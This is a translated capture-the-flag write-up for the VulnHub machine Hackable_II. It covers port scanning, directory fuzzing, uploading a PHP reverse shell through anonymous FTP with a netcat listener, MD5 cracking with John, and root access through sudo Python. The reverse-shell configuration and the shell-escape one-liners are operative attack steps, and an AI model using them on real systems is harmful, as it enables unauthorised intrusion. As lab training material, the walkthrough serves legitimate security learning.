This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.

Description

The machine selected for this write-up is Hackable_II, a straightforward but entertaining target. It reinforces core hacking skills such as basic Nmap reconnaissance, web directory enumeration, anonymous FTP, establishing a reverse shell between the server and attacker, cracking hashes with John and privilege escalation through sudo.

Reconnaissance

Port Scanning

We begin with the first step of every pentest: reconnaissance. We run Nmap with --open -p- to find every open port and -T5 for maximum speed, exporting the results in grepable format to retain the information.

1
2
3
4
5
6
7
8
9
10
11
nmap --open -p- -T5 192.168.1.64 -oG puertos
Nmap scan report for 192.168.1.64
Host is up (0.00043s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds

Once we know the victim’s open ports, we scan those specific ports with Nmap’s default scripts to gather more information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
nmap -sCV -p 21,22,80 192.168.1.64 -Pn -oN Escaneo
Nmap scan report for 192.168.1.64
Host is up (0.00024s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 109 Nov 26 2020 CALL.html
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2f:c6:2f:c4:6d:a6:f5:5b:c2:1b:f9:17:1f:9a:09:89 (RSA)
| 256 5e:91:1b:6b:f1:d8:81:de:8b:2c:f3:70:61:ea:6f:29 (ECDSA)
|_ 256 f1:98:21:91:c8:ee:4d:a2:83:14:64:96:37:5b:44:3d (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds

The results reveal a potential attack path through FTP on port 21 because anonymous authentication is enabled. The FTP server contains a file named CALL.html, which will be useful later. The machine also exposes SSH on port 22 and a web server on port 80.

Web Reconnaissance

Visiting the page reveals the default APACHE2 template.

CTFs often hide clues in a website’s source code, so let us inspect it.

The clue suggests using a web reconnaissance tool such as Gobuster or Dirb. I use Wfuzz for the brute-force attack.

You obviously will not find comments this explicit in real pentests. However, source code often reveals software versions or comments about application logic that help you understand and later exploit it. In extreme cases, you may even find usernames and passwords.

WFUZZ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
wfuzz -c --hc 404 -u http://192.168.1.64:80/FUZZ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.1.64:80/FUZZ
Total requests: 220560

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 200 374 L 962 W 11239 Ch "# directory-list-2.3-medium.txt"
000000003: 200 374 L 962 W 11239 Ch "# Copyright 2007 James Fisher"
000000007: 200 374 L 962 W 11239 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000012: 200 374 L 962 W 11239 Ch "# on at least 2 different hosts"
000000004: 200 374 L 962 W 11239 Ch "#"
000000002: 200 374 L 962 W 11239 Ch "#"
000000005: 200 374 L 962 W 11239 Ch "# This work is licensed under the Creative Commons"
000000008: 200 374 L 962 W 11239 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000006: 200 374 L 962 W 11239 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000011: 200 374 L 962 W 11239 Ch "# Priority ordered case-sensitive list, where entries were found"
000000013: 200 374 L 962 W 11239 Ch "#"
000000009: 200 374 L 962 W 11239 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000014: 200 374 L 962 W 11239 Ch "http://192.168.1.64:80/"
000000010: 200 374 L 962 W 11239 Ch "#"
000000094: 301 9 L 28 W 312 Ch "files"
000045240: 200 374 L 962 W 11239 Ch "http://192.168.1.64:80/"
000095524: 403 9 L 28 W 277 Ch "server-status"

We find a directory named files, so let us inspect it.

It contains CALL.html. Nmap previously showed that FTP gives us access to the files directory where this file is located. This should trigger an idea: if we have FTP write permissions and CALL.html is the live file served by the web server rather than a backup, we can compromise the server through file upload.

Will we receive a call? The page title is onion, which makes little sense in this context. It may simply be designed to distract us and waste our time: a textbook rabbit hole. At this point, it is worth investigating the server’s content through FTP.

Foothold

FTP

We connect to FTP with anonymous/anonymous.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ftp 192.168.1.64
Connected to 192.168.1.64.
220 ProFTPD Server (ProFTPD Default Installation) [192.168.1.64]
Name (192.168.1.64:void4m0n): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||63601|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 109 Nov 26 2020 CALL.html
226 Transfer complete
ftp>

FTP places us in the files directory containing CALL.html.

Uploading the Reverse Shell and Gaining Access as www-data

With access to the FTP server, we can upload a PHP file that executes malicious code when requested, in this case a reverse shell.

We consult Pentestmonkey’s cheat sheet and adapt the shell with the required parameters:

1
2
3
4
5
6
7
8
9
10
47set_time_limit (0);
48$VERSION = "1.0";
49$ip = '192.168.1.84'; // CHANGE THIS
50$port = 1234; // CHANGE THIS
51$chunk_size = 1400;
52$write_a = null;
53$error_a = null;
54$shell = 'uname -a; w; id; /bin/sh -i';
55$daemon = 0;
56$debug = 0;

We upload the reverse shell file to the server:

1
2
3
4
5
6
7
ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||30588|)
150 Opening BINARY mode data connection for php-reverse-shell.php
100% |******************************************************************************************************************************************************************| 5494 174.64 MiB/s 00:00 ETA
226 Transfer complete
5494 bytes sent in 00:00 (13.78 MiB/s)

The reverse shell has been successfully uploaded to /files/.

Before requesting the file from the browser and executing it, we listen on the port configured in the reverse shell.

We use Netcat:

1
2
3
❯ nc -lvp 1234
listening on [any] 1234 ...

When we request the malicious PHP file from the browser, it executes on the server and sends us the shell.

1
2
3
4
5
6
7
8
9
10
11
12
❯ nc -lvp 1234
listening on [any] 1234 ...
192.168.1.64: inverse host lookup failed: Unknown host
connect to [192.168.1.84] from (UNKNOWN) [192.168.1.64] 34428
Linux ubuntu 4.4.0-194-generic #226-Ubuntu SMP Wed Oct 21 10:19:36 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
15:55:42 up 5:04, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Privilege Escalation

www-data –> Shrek

Host Reconnaissance

We can try to spawn a TTY with python3 -c 'import pty; pty.spawn("/bin/sh")'. Once we have a usable terminal, we move to /home/ and list its contents:

1
2
3
4
5
$ cd home
cd home
$ ls
ls
important.txt shrek

There is a user named shrek whose home directory contains the first flag, user.txt, but we do not have permission to read it.

We also find a file named important.txt. Reading it reveals the following:

1
2
3
4
5
cat important.txt
run the script to see the data

/.runme.sh

We run the script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ /.runme.sh
/.runme.sh
the secret key
is
trolled
restarting computer in 3 seconds...
restarting computer in 2 seconds...
restarting computer in 1 seconds...
⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d

It looks as though we have been trolled, does it not? Looking more closely, however, we have been given a potential hash that may correspond to shrek’s password. We use hash-identifier to determine its type.

Hash Type

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ hash-identifier cf4c2232354952690368f1b3dfdfb24d
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

We have a match: MD5 appears to be the correct type.

Cracking the Hash with John

With the hash in hand, we can brute-force the plaintext password using the well-known rockyou.txt wordlist. We use John, supplying the hash type and a file containing the hash.

1
2
3
4
5
6
7
8
9
10
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash_shrek.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
onion (?)
1g 0:00:00:00 DONE (2022-06-24 21:38) 33.33g/s 2201Kp/s 2201Kc/s 2201KC/s panteraroz..jorie
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

We find a match: onion. Does that sound familiar? We already saw this string in the HTML title of CALL.html; it was under our noses from the beginning. This is why gathering as much information as possible matters in both CTFs and real pentests.

We try connecting over SSH with shrek:onion.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-194-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


90 packages can be updated.
68 updates are security updates.


Last login: Sun Jun 19 13:58:23 2022 from 192.168.1.84
shrek@ubuntu:~$

Bingo! We have access to the account, confirming that onion is the correct password. We retrieve the first flag from shrek’s home directory.

User.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
shrek@ubuntu:~$ cat user.txt 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXK0OkkkkO0KXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXOo:'. .';lkXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXKo' .ckXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXx, ........ :OXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXk. ............. 'kXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXK; ............... '0XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX0. .:lol;. .....;oxkxo:..... oXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX0 .oNMMMMMMMO. ...lXMMMMMMMWO;... cXXXXXXXXXXXXXXX
XXXXXXXXXXXXXK. lWMMMMMMMMMMW; ..xMMMMMMMMMMMMx.... lXXXXXXXXXXXXXX
XXXXXXXXXXXXX; kMMMMMMMMMMMMMM..:MMMMMMMMMMMMMM0... OXXXXXXXXXXXXX
XXXXXXXXXXXXO oMMMMMXKXMMMMMMM:.kMMMMMMNKNMMMMMMo... 'XXXXXXXXXXXXX
XXXXXXXXXXXX, WMMWl. :OK0MMMMMl.OMMMMo. ,OXXWMMMX... XXXXXXXXXXXXX
XXXXXXXXXXXX 'MMM: 0MMocMMMM,.oMMMl xMMO;MMMM... kXXXXXXXXXXXX
XXXXXXXXXXX0 .MMM, .. ;MMM0 ..NMM: .. 'MMMW... kXXXXXXXXXXXX
XXXXXXXXXXXO XMMX' ,NMMX ..;WMN, .XMMMO... xXXXXXXXXXXXX
XXXXXXXXXXX0 .NMMMXkxkXMMMk ...,0MMXkxkXMMMMN,... dXXXXXXXXXXXX
XXXXXXXXXXXX .xWMMMMMMWk. .....c0MMMMMMMMk'.... dXXXXXXXXXXXX
XXXXXXXXXXXXl ,colc' .;::o:dc,..'codxdc''..... dXXXXXXXXXXXX
XXXXXXXXXXXXX .OOkxxdxxkOOOx ,d.:OOOOkxxxxkkOOd.... xXXXXXXXXXXXX
XXXXXXXXXXXXXd oOOOOOOOOOOOOxOOOOOOOOOOOOOOOOO,.... OXXXXXXXXXXXX
XXXXXXXXXXXXXX. cOOOOOOOOOOOOOOOOOOOOOOOOOOOx,..... KXXXXXXXXXXXX
XXXXXXXXXXXXXXO .xOOOOOOOOOOOOOOOOOOOOOOOkc....... NXXXXXXXXXXXX
XXXXXXXXXXXXXXX; ;kOOOOOOOOOOOOOOOOOOOkc......... ,XXXXXXXXXXXXX
XXXXXXXXXXXXXXX0 ;kOOOOOOOOOOOOOOOd;........... dXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX. ,dOOOOOOOOOOdc'............. xXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX. .''''.. ............... .kXXXXXXXXXXXX
XXXXXXXXXXXXXXXK .;okKNWWWWNKOd:. .............. 'kXXXXXXXXXX
XXXXXXXXXXXXXXX' .dXMMMMMMMMMMMMMMMMWO: ............. 'kXXXXXXXX
XXXXXXXXXXXXXK' ,0MMMMMMMMMMMMMMMMMMMMMMWx. ............ ,KXXXXXX
XXXXXXXXXXXKc .0MMMMMMMMMMMMMMMMMMMMMMMMMMMk. ............ xXXXXX
XXXXXXXXXXl cWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMo ............. :XXXX
XXXXXXXXK. dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0 ............ .KXX
XXXXXXXX. 'MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMO ............. 'XX

invite-me: https://www.linkedin.com/in/eliastouguinho/

We have the first flag; now for root.

Shrek –> Root

For privilege escalation, we run sudo -l to list our sudo permissions.

1
2
3
4
5
6
7
shrek@ubuntu:/home$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5

The shrek user can execute /usr/bin/python3.5 as root, allowing us to escalate privileges through Python. GTFOBins can help us.

Because we can execute Python as root, we simply use its native os library to run system commands. Any command launched by Python inherits the root context, giving us privilege escalation.

1
2
3
4
5
$ whoami
shrek
$ sudo python3.5 -c 'import os; os.system("/bin/sh")'
# whoami
root

We have root access! Now for the flag in /root/.

Root.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# cat root.txt
____
____....----''''```` |.
,'''```` ____....----; '.
| __....----''''```` .-.`'. '.
|.-. ..... | | '. '.
`| | ..:::::::::::::::| | .-;. |
| |`'-;-::::::::::::::::::::| |,,.| |-='
| | | ::::::::::::::::::::| | | |
| | | :::::::::::::::;;;;;| | | |
| | | :::::::::;;;2KY2KY2Y| | | |
| | | :::::;;Y2KY2KY2KY2KY| | | |
| | | :::;Y2Y2KY2KY2KY2KY2| | | |
| | | :;Y2KY2KY2KY2KY2K+++| | | |
| | | |;2KY2KY2KY2++++++++| | | |
| | | | ;++++++++++++++++;| | | |
| | | | ;++++++++++++++;.| | | |
| | | | :++++++++++++: | | | |
| | | | .:++++++++;. | | | |
| | | | .:;+:.. | | | |
| | | | ;; | | | |
| | | | .,:+;:,. | | | |
| | | | .::::;+::::, | | | |
| | | | ::::::;;::::::. | | | |
| | | | :::::::+;:::::::.| | | |
| | | | ::::::::;;::::::::| | | |
| | | |:::::::::+:::::::::| | | |
| | | |:::::::::+:::::::::| | | |
| | | ::::::::;+++;:::::::| | | |
| | | :::::::;+++++;::::::| | | |
| | | ::::::;+++++++;:::::| | | |
| | |.:::::;+++++++++;::::| | | |
| | ,`':::::;+++++++++++;:::| |'"-| |-..
| |' ::::;+++++++++++++;::| | '-' ,|
| | ::::;++++++++++++++;:| | .' |
,;-'_ `-._===++++++++++_.-'| | .' .'
| ````'''----....___-' '-' .' .'
'---....____ ````'''--; ,'
````''''----....____|.'

invite-me: https://www.linkedin.com/in/eliastouguinho/#

Conclusions

This was a straightforward machine, but a very useful one for anyone starting in this field. In summary, we covered the following concepts:

  • Basic reconnaissance with Nmap.
  • Web reconnaissance through directory fuzzing with Wfuzz.
  • Establishing a reverse shell through a PHP file by abusing an insecure FTP configuration.
  • Identifying and cracking hashes with hash-identifier and John.
  • Privilege escalation through insecure sudo permissions.

Credits and Download

The machine was created by Elias Sousa; see his LinkedIn. Thank you for creating it and contributing it to the community.

Hackable II can be downloaded from VulnHub.

VulnHub is a fantastic platform where ANYONE can upload their own CTFs, so it carries an inherent risk. Before using any machine, I recommend researching its creator and building an isolated environment that minimises the risk in case the machine is malicious.